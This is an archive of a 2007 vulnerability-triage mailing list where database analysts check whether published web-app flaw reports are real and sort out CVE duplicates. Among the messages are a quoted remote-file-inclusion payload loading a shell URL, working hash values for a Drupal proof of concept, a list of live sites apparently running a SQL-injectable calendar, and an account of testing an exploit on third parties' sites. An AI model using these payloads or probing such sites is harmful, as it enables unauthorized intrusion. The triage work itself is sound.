From theall at tenablesecurity.com Mon Oct 1 00:10:01 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Sun, 30 Sep 2007 20:10:01 -0400
Subject: [VIM] Bogus: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
Message-ID: <47003AD9.4080606@tenablesecurity.com>

Milw0rm 4470 / Bugtraq 25866 seems bogus to me -- looking at the copy of contrib/mx_glance_sdesc.php included in http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336 shows this:

---- snip, snip, snip ----
/**
*
* @package mxBB Portal Module - mx_glance
* @version $Id: mx_glance.php,v 2.3.3 2007/01/31 11:58:22 OryNider Exp $
...
if( !defined('IN_PORTAL') || !is_object($mx_block))
{
die("Hacking attempt");
}
---- snip, snip, snip ----

So direct calls to the affected script will fail.

George

References: <47003AD9.4080606@tenablesecurity.com>
Message-ID: <47004ED5.3010904@milw0rm.com>

Check out where the /* starts and */ ends. Must have been a coding mistake, but the vulnerability is there.

/str0ke

George A. Theall wrote:
> Milw0rm 4470 / Bugtraq 25866 seems bogus to me -- looking at the copy
> of contrib/mx_glance_sdesc.php included in
> http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336
> shows this:
>
> ---- snip, snip, snip ----
> /**
> *
> * @package mxBB Portal Module - mx_glance
> * @version $Id: mx_glance.php,v 2.3.3 2007/01/31 11:58:22 OryNider Exp $
> ...
> if( !defined('IN_PORTAL') || !is_object($mx_block))
> {
> die("Hacking attempt");
> }
> ---- snip, snip, snip ----
>
> So direct calls to the affected script will fail.
>
>
> George

From theall at tenablesecurity.com Mon Oct 1 01:40:55 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Sun, 30 Sep 2007 21:40:55 -0400
Subject: [VIM] Bogus: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
In-Reply-To: <47004ED5.3010904@milw0rm.com>
References: <47003AD9.4080606@tenablesecurity.com> <47004ED5.3010904@milw0rm.com>
Message-ID: <47005027.4020701@tenablesecurity.com>

On 09/30/07 21:35, str0ke wrote:
> Check out where the /* starts and */ ends. Must have been a coding
> mistake, but the vulnerability is there.

Ah, I missed that. Thanks for clearing it up.
George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Mon Oct 1 17:20:27 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 01 Oct 2007 13:20:27 -0400
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
Message-ID: <47012C5B.5060101@tenablesecurity.com>

It looks like Milw0rm 4476 is bogus -- $themedir is set in config.inc.php to 'themes', and it does not seem to be overwritten later. [config.inc.php is not included in the distribution file but it's created from config_sample.inc.php as part of the installation process.]

Or did I mess this one up too?

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Mon Oct 1 17:29:31 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 01 Oct 2007 12:29:31 -0500
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <47012C5B.5060101@tenablesecurity.com>
References: <47012C5B.5060101@tenablesecurity.com>
Message-ID: <47012E7B.5080302@milw0rm.com>

Hey George,

Ya, I thought the same thing; tested it on multiple sites ranging from 1.8.4 and below and it worked like a charm.

George A. Theall wrote:
> It looks like Milw0rm 4476 is bogus -- $themedir is set in
> config.inc.php to 'themes', and it does not seem to be overwritten
> later. [config.inc.php is not included in the distribution file but
> it's created from config_sample.inc.php as part of the installation
> process.]
>
> Or did I mess this one up too?
>
> George

From theall at tenablesecurity.com Mon Oct 1 17:31:58 2007
From: theall at tenablesecurity.com (George A.
Theall)
Date: Mon, 01 Oct 2007 13:31:58 -0400
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <47012E7B.5080302@milw0rm.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com>
Message-ID: <47012F0E.7050106@tenablesecurity.com>

On 10/01/07 13:29, str0ke wrote:
> Ya, I thought the same thing; tested it on multiple sites ranging from
> 1.8.4 and below and it worked like a charm.

Hmm, I installed it locally and the PoC failed for me.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Mon Oct 1 17:48:55 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 01 Oct 2007 12:48:55 -0500
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <47012F0E.7050106@tenablesecurity.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com>
Message-ID: <47013307.4090204@milw0rm.com>

Strange, it seems that since posting, most of the targets have been hacked or the web pages have gone offline in the last 30 minutes or so. I'll fiddle with this one a little more later on today.

/str0ke

George A. Theall wrote:
> On 10/01/07 13:29, str0ke wrote:
>
>> Ya, I thought the same thing; tested it on multiple sites ranging from
>> 1.8.4 and below and it worked like a charm.
>
> Hmm, I installed it locally and the PoC failed for me.
>
>
> George

From theall at tenablesecurity.com Mon Oct 1 17:53:59 2007
From: theall at tenablesecurity.com (George A.
Theall)
Date: Mon, 01 Oct 2007 13:53:59 -0400
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <47013307.4090204@milw0rm.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com>
Message-ID: <47013437.7090707@tenablesecurity.com>

On 10/01/07 13:48, str0ke wrote:
> Strange, it seems that since posting, most of the targets have been hacked
> or the web pages have gone offline in the last 30 minutes or so.

Yeah, weird. I installed 1.8.4 with register_globals and magic_quotes_gpc enabled (docs/INSTALL.txt recommends both settings) and using PHP 4.4 (old, but that's what I have on my general LAMP lab box). Debug statements around the supposedly vulnerable line of code as well as before / after where it's set in config.inc.php show the value I'm passing in via the URL is getting overwritten and not re-appearing.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Mon Oct 1 18:03:39 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 01 Oct 2007 13:03:39 -0500
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <47013437.7090707@tenablesecurity.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com>
Message-ID: <4701367B.5020103@milw0rm.com>

Hey George,

Test it out with globals = off.

Seems he's doing some hacking; look at index.php for register_globals.

So they need register_globals to be off for this vuln to work properly << kind of scary.

/str0ke

George A. Theall wrote:
> On 10/01/07 13:48, str0ke wrote:
>
>> Strange, it seems that since posting, most of the targets have been hacked
>> or the web pages have gone offline in the last 30 minutes or so.
>
> Yeah, weird.
> I installed 1.8.4 with register_globals and
> magic_quotes_gpc enabled (docs/INSTALL.txt recommends both settings)
> and using PHP 4.4 (old, but that's what I have on my general LAMP
> lab box). Debug statements around the supposedly vulnerable line of
> code as well as before / after where it's set in config.inc.php show
> the value I'm passing in via the URL is getting overwritten and not
> re-appearing.
>
>
> George

From theall at tenablesecurity.com Mon Oct 1 18:13:20 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 01 Oct 2007 14:13:20 -0400
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <4701367B.5020103@milw0rm.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com> <4701367B.5020103@milw0rm.com>
Message-ID: <470138C0.6040601@tenablesecurity.com>

On 10/01/07 14:03, str0ke wrote:
> Test it out with globals = off.
>
> Seems he's doing some hacking; look at index.php for register_globals.
>
> So they need register_globals to be off for this vuln to work properly
> << kind of scary.

You're right again. In includes.inc.php, there's a call to import_request_variables() if register_globals is *not* set.

George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Thu Oct 4 19:52:12 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 4 Oct 2007 15:52:12 -0400 (EDT)
Subject: [VIM] Bogus: Segue CMS <= 1.8.4 index.php Remote File Inclusion Vulnerability
In-Reply-To: <470138C0.6040601@tenablesecurity.com>
References: <47012C5B.5060101@tenablesecurity.com> <47012E7B.5080302@milw0rm.com> <47012F0E.7050106@tenablesecurity.com> <47013307.4090204@milw0rm.com> <47013437.7090707@tenablesecurity.com> <4701367B.5020103@milw0rm.com> <470138C0.6040601@tenablesecurity.com>
Message-ID:

On Mon, 1 Oct 2007, George A.
Theall wrote:
> > So they need register_globals to be off for this vuln to work properly
> > << kind of scary.
>
> You're right again. In includes.inc.php, there's a call to
> import_request_variables() if register_globals is *not* set.

I expect this is going to happen a LOT more as people implement their own register_globals emulations. Nice catch y'all!

- Steve

From coley at mitre.org Fri Oct 5 20:49:30 2007
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 5 Oct 2007 16:49:30 -0400 (EDT)
Subject: [VIM] Clarification on xfs CVE's
Message-ID: <200710052049.l95KnURh015210@faron.mitre.org>

All,

As of right now, this is my understanding of the CVE's associated with the xfs issues. This was a complicated issue pre-disclosure that didn't get resolved until after some initial announcements. I hope it's resolved, anyway :)

CVE-2007-4989 and CVE-2007-4990 were originally reserved by iDefense from me. CVE-2007-4568 was separately assigned by the Red Hat CNA to both build_range and swap_char2b because they were both regarded as integer overflows, so I deferred to Red Hat and suggested to vendor-sec that CVE-2007-4989 and CVE-2007-4990 should be regarded as dupes.

However, subsequent discussion suggested that swap_char2b is not an integer overflow, but by the time this conclusion was released, CVE-2007-4568 had already been included in several disclosures. So, CVE-2007-4990 was used to handle swap_char2b. This is why some disclosures only have CVE-2007-4568, and others list all three CVEs.

At this moment, I have:

CVE-2007-4568 - build_range integer overflow
CVE-2007-4989 - REJECT as dupe of 4568
CVE-2007-4990 - swap_char2b "heap corruption"

- Steve

From theall at tenablesecurity.com Sat Oct 6 03:01:21 2007
From: theall at tenablesecurity.com (George A.
Theall)
Date: Fri, 05 Oct 2007 23:01:21 -0400
Subject: [VIM] Recent GForge SQL Injection Vulnerabilities
Message-ID: <4706FA81.4040203@tenablesecurity.com>

In case anyone's interested, it looks like Bugtraq 25585 / CVE-2007-3913 on one hand and Bugtraq 25665 / CVE-2007-4966 on the other refer to the same issue disclosed by Sumit I. Siddharth as part of Portcullis Security Advisory 07-014.

The first pair of ids refer to Debian's DSA 1369-1 advisory, which in turn credits Sumit I. Siddharth. Their patch (gforge_3.1-31sarge2.diff.gz) is fairly large, but it does fix a SQL injection issue in editprofile.php involving the variable $skill_delete.

And the GForge developers have committed a somewhat different fix for the issue on September 6th, as shown here:

http://lists.gforge.org/pipermail/gforge-commits/2007-September/000537.html

It references CVE-2007-3913.

Thoughts?

George
--
theall at tenablesecurity.com

From coley at mitre.org Sat Oct 6 16:35:47 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 6 Oct 2007 12:35:47 -0400 (EDT)
Subject: [VIM] smells false: phpFreeLog RFI
Message-ID: <200710061635.l96GZl1f006343@faron.mitre.org>

Researcher: KUZ3Y (labeled as "Vendor")

http://www.secumania.org/exploits/web-applications/phpfreelog-alpha-v0_2_0--%3C%3D--remote-file-inclusion-vulnerability-2007092832175/

This line is quoted:

  include_once $this->var_dir.$var.'.php';

with this exploit:

  /patch/log.php?var=http://localhost/shell.txt?

First of all, $var_dir is defined to a constant path, so RFI doesn't look possible.

Secondly, the include_once call is in a class definition, wrapped within a foreach:

  foreach ($var_types as $var) {

which would overwrite $var.

And, this is within a read_mod() method that appears to be called with uncontrollable data, but I'm not 100% clear on that.
- Steve

From jericho at attrition.org Mon Oct 8 06:00:51 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 8 Oct 2007 06:00:51 +0000 (UTC)
Subject: [VIM] new strategy for dealing with pesky vulnerabilities
Message-ID:

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=572

11/02/2004 Initial vendor notification
11/03/2004 Initial vendor response
12/19/2005 Second vendor notification
01/30/2007 Third vendor notification
01/30/2007 Third vendor response
04/25/2007 Status update requested
06/08/2007 Status update requested
07/24/2007 Status update requested
07/30/2007 Vendor stated product's support ended in 2002
08/06/2007 Vendor communicated their response
08/07/2007 Coordinated public disclosure

November 2, 2004, HP is informed of the vulnerability in HP-UX 11.11i. Almost three years later, HP says "product's support ended in 2002". Also from the advisory:

Hewlett-Packard states that this product is obsolete and no longer supported. They have no plans to release a patch or advisory. They further stated that the version of HP-UX used to verify this vulnerability is also obsolete.

"HP simply recommends that customers upgrade to a currently supported OS release and to some other tool, if one is available."

So it took HP almost three years to realize the software was no longer supported and say that is a solution?

From jms at bughunter.ca Mon Oct 8 16:38:23 2007
From: jms at bughunter.ca (J.M. Seitz)
Date: Mon, 08 Oct 2007 09:38:23 -0700
Subject: [VIM] new strategy for dealing with pesky vulnerabilities
In-Reply-To:
References:
Message-ID: <470A5CFF.8090406@bughunter.ca>

Is it any wonder that the faith in responsible disclosure is waning? Who are you protecting by giving this to a company like HP, praying to the Greek goddess Vulnerabilica and hoping they will fix it? Meanwhile, if after 6 months you drop a 0-day because they haven't done anything, they might just move on it.
But then of course you get absolutely flamed for being a black-hat..... oh well, it's Thanksgiving here today, turkey will make me feel better.

security curmudgeon wrote:
>
> http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=572
>
> 11/02/2004 Initial vendor notification
> 11/03/2004 Initial vendor response
> 12/19/2005 Second vendor notification
> 01/30/2007 Third vendor notification
> 01/30/2007 Third vendor response
> 04/25/2007 Status update requested
> 06/08/2007 Status update requested
> 07/24/2007 Status update requested
> 07/30/2007 Vendor stated product's support ended in 2002
> 08/06/2007 Vendor communicated their response
> 08/07/2007 Coordinated public disclosure
>
>
> November 2, 2004, HP is informed of the vulnerability in HP-UX 11.11i.
> Almost three years later, HP says "product's support ended in 2002".
> Also from the advisory:
>
> Hewlett-Packard states that this product is obsolete and no longer
> supported. They have no plans to release a patch or advisory. They
> further stated that the version of HP-UX used to verify this
> vulnerability is also obsolete.
>
> "HP simply recommends that customers upgrade to a currently supported OS
> release and to some other tool, if one is available."
>
> So it took HP almost three years to realize the software was no longer
> supported and say that is a solution?
>

From theall at tenablesecurity.com Tue Oct 9 02:16:22 2007
From: theall at tenablesecurity.com (George A.
Theall)
Date: Mon, 08 Oct 2007 22:16:22 -0400
Subject: [VIM] Joomla Flash Image Gallery Component RFI Vulnerability
Message-ID: <470AE476.2060804@tenablesecurity.com>

The affected parameter in Milw0rm 4496 is wrong -- it should be 'mosConfig_live_site' rather than 'mosConfig_absolute_path'. The affected file in at least version 1.0 of the component is:

----- snip, snip, snip -----
include( "$mosConfig_live_site/components/com_wmtgallery/about.html" );
?>
----- snip, snip, snip -----

Bugtraq 25958 appears to have the same problem with the proof-of-concept they provide.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Tue Oct 9 02:37:07 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 08 Oct 2007 21:37:07 -0500
Subject: [VIM] Joomla Flash Image Gallery Component RFI Vulnerability
In-Reply-To: <470AE476.2060804@tenablesecurity.com>
References: <470AE476.2060804@tenablesecurity.com>
Message-ID: <470AE953.6090900@milw0rm.com>

This has been changed on my end, good catch.

/str0ke

George A. Theall wrote:
> The affected parameter in Milw0rm 4496 is wrong -- it should be
> 'mosConfig_live_site' rather than 'mosConfig_absolute_path'. The
> affected file in at least version 1.0 of the component is:
>
> ----- snip, snip, snip -----
> include( "$mosConfig_live_site/components/com_wmtgallery/about.html" );
> ?>
> ----- snip, snip, snip -----
>
> Bugtraq 25958 appears to have the same problem with the
> proof-of-concept they provide.
>
>
> George

From str0ke at milw0rm.com Thu Oct 11 19:03:06 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 11 Oct 2007 14:03:06 -0500
Subject: [VIM] false: Joomla! swMenuFree 4.6 Component Remote File Include
Message-ID: <470E736A.7070902@milw0rm.com>

preview.php (modified 30 March 2007) line 9:

  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

/str0ke

-------------- next part --------------
An embedded message was scrubbed...
From: Guns at 0x90.com.ar
Subject: Joomla!
swMenuFree 4.6 Component Remote File Include
Date: 11 Oct 2007 16:41:50 -0000
Size: 2129
Url: http://www.attrition.org/pipermail/vim/attachments/20071011/e6a7da3c/attachment.mht

From coley at mitre.org Fri Oct 12 00:27:09 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 11 Oct 2007 20:27:09 -0400 (EDT)
Subject: [VIM] clarification on multiple Tk overflow issues
Message-ID: <200710120027.l9C0R9gp013109@faron.mitre.org>

Ubuntu just informed CVE of an older variant of CVE-2007-5137.

CVE-2007-5378 - 8.4.12 and earlier

CVE-2007-5137 - only affects 8.4.13 through 8.4.15; this was an incorrect or incomplete patch for CVE-2007-5378.

These issues might look the same. My read on it is: for 5378, the second frame is LARGER than the first; for 5137, the second frame is SMALLER than the first.

Note that another ID, CVE-2007-4851, was found to be a duplicate of CVE-2007-5137, so don't use 4851.

- Steve

======================================================
Name: CVE-2007-5137
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5137
Reference: MISC:http://bugs.gentoo.org/show_bug.cgi?id=192539
Reference: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=541207
Reference: GENTOO:GLSA-200710-07
Reference: URL:http://security.gentoo.org/glsa/glsa-200710-07.xml
Reference: BID:25826
Reference: URL:http://www.securityfocus.com/bid/25826
Reference: SECUNIA:26942
Reference: URL:http://secunia.com/advisories/26942
Reference: SECUNIA:27086
Reference: URL:http://secunia.com/advisories/27086

Buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl (Tcl/Tk) 8.4.13 through 8.4.15 allows remote attackers to execute arbitrary code via multi-frame interlaced GIF files in which later frames are smaller than the first. NOTE: this issue is due to an incorrect patch for CVE-2007-5378.
======================================================
Name: CVE-2007-5378
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378
Reference: CONFIRM:https://sourceforge.net/tracker/?func=detail&atid=112997&aid=1458234&group_id=12997

Buffer overflow in the FileReadGIF function in tkImgGIF.c for Tk Toolkit 8.4.12 and earlier, and 8.3.5 and earlier, allows user-assisted attackers to cause a denial of service (segmentation fault) via an animated GIF in which the first subimage is smaller than a subsequent subimage, which triggers the overflow in the ReadImage function, a different vulnerability than CVE-2007-5137.

From nikns at secure.lv Fri Oct 12 08:27:59 2007
From: nikns at secure.lv (Nikns Siankin)
Date: Fri, 12 Oct 2007 11:27:59 +0300
Subject: [VIM] clarification on multiple Tk overflow issues
In-Reply-To: <200710120027.l9C0R9gp013109@faron.mitre.org>
References: <200710120027.l9C0R9gp013109@faron.mitre.org>
Message-ID: <20071012082759.GA7037@secure.lv>

On Thu, Oct 11, 2007 at 08:27:09PM -0400, Steven M. Christey wrote:
>CVE-2007-5378 - 8.4.12 and earlier
>
>CVE-2007-5137 - only affects 8.4.13 through 8.4.15; this was an
>incorrect or incomplete patch for CVE-2007-5378.

Hi, Steve!

Why is http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378 inaccessible?
>
>
>
>======================================================
>Name: CVE-2007-5137
>Status: Candidate
>URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5137
>Reference: MISC:http://bugs.gentoo.org/show_bug.cgi?id=192539
>Reference: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=541207
>Reference: GENTOO:GLSA-200710-07
>Reference: URL:http://security.gentoo.org/glsa/glsa-200710-07.xml
>Reference: BID:25826
>Reference: URL:http://www.securityfocus.com/bid/25826
>Reference: SECUNIA:26942
>Reference: URL:http://secunia.com/advisories/26942
>Reference: SECUNIA:27086
>Reference: URL:http://secunia.com/advisories/27086
>
>Buffer overflow in the ReadImage function in generic/tkImgGIF.c in Tcl
>(Tcl/Tk) 8.4.13 through 8.4.15 allows remote attackers to execute
>arbitrary code via multi-frame interlaced GIF files in which later
>frames are smaller than the first. NOTE: this issue is due to an
>incorrect patch for CVE-2007-5378.
>
>
>======================================================
>Name: CVE-2007-5378
>Status: Candidate
>URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5378
>Reference: CONFIRM:https://sourceforge.net/tracker/?func=detail&atid=112997&aid=1458234&group_id=12997
>
>Buffer overflow in the FileReadGIF function in tkImgGIF.c for Tk
>Toolkit 8.4.12 and earlier, and 8.3.5 and earlier, allows
>user-assisted attackers to cause a denial of service (segmentation
>fault) via an animated GIF in which the first subimage is smaller than
>a subsequent subimage, which triggers the overflow in the ReadImage
>function, a different vulnerability than CVE-2007-5137.
>
>

From coley at mitre.org Sat Oct 13 00:21:16 2007
From: coley at mitre.org (Steven M.
Christey)
Date: Fri, 12 Oct 2007 20:21:16 -0400 (EDT)
Subject: [VIM] CVE-2007-5324 (IBM DB2JDS overflows) is a dupe of CVE-2007-2582
Message-ID: <200710130021.l9D0LGM6003830@faron.mitre.org>

ZDI recently confirmed to me that the IBM DB2JDS overflows they just reported are already covered by CVE-2007-2582. The link between the two is APAR IY97750, which was vaguely written in the initial disclosure, but it's the proper fix for the ZDI overflows.

Just FYI, since some VDB's appear to have duplicate entries. We're using CVE-2007-2582 since it's been out longer.

- Steve

From theall at tenablesecurity.com Sat Oct 13 01:26:01 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 12 Oct 2007 21:26:01 -0400
Subject: [VIM] CVE-2007-5324 (IBM DB2JDS overflows) is a dupe of CVE-2007-2582
In-Reply-To: <200710130021.l9D0LGM6003830@faron.mitre.org>
References: <200710130021.l9D0LGM6003830@faron.mitre.org>
Message-ID: <47101EA9.5070700@tenablesecurity.com>

On 10/12/07 20:21, Steven M. Christey wrote:
> ZDI recently confirmed to me that the IBM DB2JDS overflows they just
> reported are already covered by CVE-2007-2582. The link between the
> two is APAR IY97750, which was vaguely written in the initial
> disclosure, but it's the proper fix for the ZDI overflows.

Ah, thanks for pointing that out. What about the denial of service issues ZDI also reported (invalid LANG parameter and MemTree overflow)? Neither is mentioned in IY97750, and I couldn't find them in the list of APARs IBM claimed were addressed by 8.1 FixPak 15.

George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Sat Oct 13 11:04:51 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Sat, 13 Oct 2007 07:04:51 -0400
Subject: [VIM] Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability
Message-ID: <4710A653.9090707@tenablesecurity.com>

There seems to be a mistake in Milw0rm 4524... I downloaded the component and installed it.
The affected file listed in the advisory, /components/com_colorlab/admin.color.php, does not exist. But /administrator/components/com_color/admin.color.php does exist and is affected.

The only line in the file, other than the PHP tags, is:

  include( "$mosConfig_live_site/components/com_color/about.html" );

so register_globals is required for exploitation.

George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Sat Oct 13 11:12:04 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Sat, 13 Oct 2007 07:12:04 -0400
Subject: [VIM] Urchin Report.CGI Authorization Bypass Vulnerability
Message-ID: <4710A804.6070701@tenablesecurity.com>

FWIW, the authorization bypass issue in Urchin reported by MustLive (http://securityvulns.ru/Sdocument90.html) and covered by CVE-2007-5113 / Bugtraq 26037 seems to be a feature rather than a vulnerability. At least in version 5.7.03, an administrator must enable "Direct Report Linking" (under "Settings", "Access Settings"). It is disabled by default, and the online help for this setting says:

"Enabling this feature allows you to circumvent authentication and create links directly to reports. This can be useful for systems that are already password or network protected"...

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Sat Oct 13 15:02:40 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sat, 13 Oct 2007 10:02:40 -0500
Subject: [VIM] Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability
In-Reply-To: <4710A653.9090707@tenablesecurity.com>
References: <4710A653.9090707@tenablesecurity.com>
Message-ID: <4710DE10.5030006@milw0rm.com>

Thanks brotha for the info. Fixing it up.

/str0ke

George A. Theall wrote:
> There seems to be a mistake in Milw0rm 4524... I downloaded the
> component and installed it. The affected file listed in the advisory,
> /components/com_colorlab/admin.color.php, does not exist.
> But
> /administrator/components/com_color/admin.color.php does exist and is
> affected.
>
> The only line in the file, other than the PHP tags, is:
>
> include( "$mosConfig_live_site/components/com_color/about.html" );
>
> so register_globals is required for exploitation.
>
> George

From coley at mitre.org Tue Oct 16 21:39:27 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 16 Oct 2007 17:39:27 -0400 (EDT)
Subject: [VIM] true: WebMod 0.48 XSS
Message-ID: <200710162139.l9GLdRj0002492@faron.mitre.org>

Wide publication by SECUNIA:27245

Seems to be related to a post by "nemessis" at http://sla.ckers.org/forum/read.php?3,44,11482#msg-11482

Seems to be live on some servers based on Google search results.

source: http://djeyl.net/files.php#webmod

auth.w appears to utilize a custom or non-typical programming language mixed with HTML, probably called W, without any apparent documentation in the WebMod package. Commands are encoded within "{}".

The relevant line is:
where, from context in other source code, "G" is an array/hash/structure that contains values from GET requests.

- Steve

From coley at mitre.org Tue Oct 16 22:14:27 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 16 Oct 2007 18:14:27 -0400 (EDT)
Subject: [VIM] Mandriva's turn to break advisory URLs
Message-ID: <200710162214.l9GMERXK003274@faron.mitre.org>

Apparently, this doesn't work any more:

http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:193

but this does:

http://frontal2.mandriva.com/en/security/advisories?name=MDKSA-2007:193

I'll send an email inquiry/request to see if they can handle the older URLs.

- Steve

From coley at linus.mitre.org Wed Oct 17 19:28:00 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 17 Oct 2007 15:28:00 -0400 (EDT)
Subject: [VIM] Mandriva's turn to break advisory URLs
In-Reply-To: <200710162214.l9GMERXK003274@faron.mitre.org>
References: <200710162214.l9GMERXK003274@faron.mitre.org>
Message-ID:

OK, I've cleared things up with Mandriva. The URLs are back again. They also suggested using "www.mandriva.com" as the permanent hostname instead of "frontal2.mandriva.com".

Also, it looks like mandrakesoft.com URLs can be repaired in a similar fashion.

- Steve

From coley at mitre.org Thu Oct 18 19:38:00 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 18 Oct 2007 15:38:00 -0400 (EDT)
Subject: [VIM] true: Galmeta Post 0.11 RFI
Message-ID: <200710181938.l9IJc0RC016073@faron.mitre.org>

Ref: http://arfis.wordpress.com/2007/09/13/rfi-02-galmeta-post/

Context: One of our analysts is looking at arfis posts as time allows. Their record is about 50/50 in terms of disputes.

In this case, the line quoted in the disclosure is the first executable line:

  require_once ( $DDS . "../adodb_lite/adodb.inc.php");

The distribution has a .htaccess with a RewriteRule

  RewriteRule ^([a-zA-Z0-9_\/\-\!\~]*(\&.*)?)$ index.php?$1

that might suggest protection against direct request, but it's only intended to take odd URLs without "." characters and post them to index.php.

- Steve

From theall at tenablesecurity.com Fri Oct 19 16:17:06 2007
From: theall at tenablesecurity.com (George A. The
all)
Date: Fri, 19 Oct 2007 12:17:06 -0400
Subject: [VIM] Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
Message-ID: <4718D882.9030200@tenablesecurity.com>

Has anyone had a chance to look at Milw0rm 4510? I have two comments about it...

First, it requires that register_globals be enabled so that drupal_unset_globals() in includes/bootstrap.inc tries to unset variables. But Drupal going back at least to version 4.6.3 comes with a .htaccess file intended to disable register_globals, which would seem to significantly reduce the number of possible installs that could be attacked successfully.

Second, I'm not clear where the hash value used in the PoC comes from. I implemented the code from Esser's advisory in a little hash value calculator, and running that for the '_menu' parameter tells me to use '-800928983' for PHP 4.x or '-312030023' for PHP 5.x. And indeed substituting the first value works just dandy for me on my test system.

George
--
theall at tenablesecurity.com

From coley at mitre.org Mon Oct 29 21:00:17 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 29 Oct 2007 17:00:17 -0400 (EDT)
Subject: [VIM] Aleris Software Systems Web Publisher - site-specific?
Message-ID: <200710292100.l9TL0Ha1003141@faron.mitre.org>

Ref: Aleris Software Systems Web Publisher Calendar SQL injection
http://www.securityfocus.com/archive/1/archive/1/482723/100/0/threaded
Researcher: Joseph.giron13

The vendor's home pages don't provide any clear indication about whether this is distributable software, or something site-specific. Anybody else investigated this?
- Steve

From theall at tenablesecurity.com Mon Oct 29 21:16:54 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 29 Oct 2007 17:16:54 -0400
Subject: [VIM] Aleris Software Systems Web Publisher - site-specific?
In-Reply-To: <200710292100.l9TL0Ha1003141@faron.mitre.org>
References: <200710292100.l9TL0Ha1003141@faron.mitre.org>
Message-ID: <47264DC6.2080902@tenablesecurity.com>

On 10/29/07 17:00, Steven M. Christey wrote:
> The vendor's home pages don't provide any clear indication about
> whether this is distributable software, or something site-specific.
> Anybody else investigated this?

Based on the handful of sites I found to be using it, I would guess they're all designed by the same design firm (Courika Solutions); eg,

- http://www.maysvillekentucky.com/calendar/page.asp?mode=
- http://www.ripleylibrary.com/calendar/page.asp?mode=
- http://www.masoncountyrelay.com/calendar/page.asp?mode=
- http://cityofmaysville.com/calendar/page.asp?mode=
- http://www.masoncoschools.com/calendar/page.asp?mode=
- http://mason.k12.ky.us/calendar/page.asp?mode=

But that's just a guess... I couldn't find a download either.

George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Mon Oct 29 21:21:00 2007
From: coley at linus.mitre.org (Steven M. Christey)
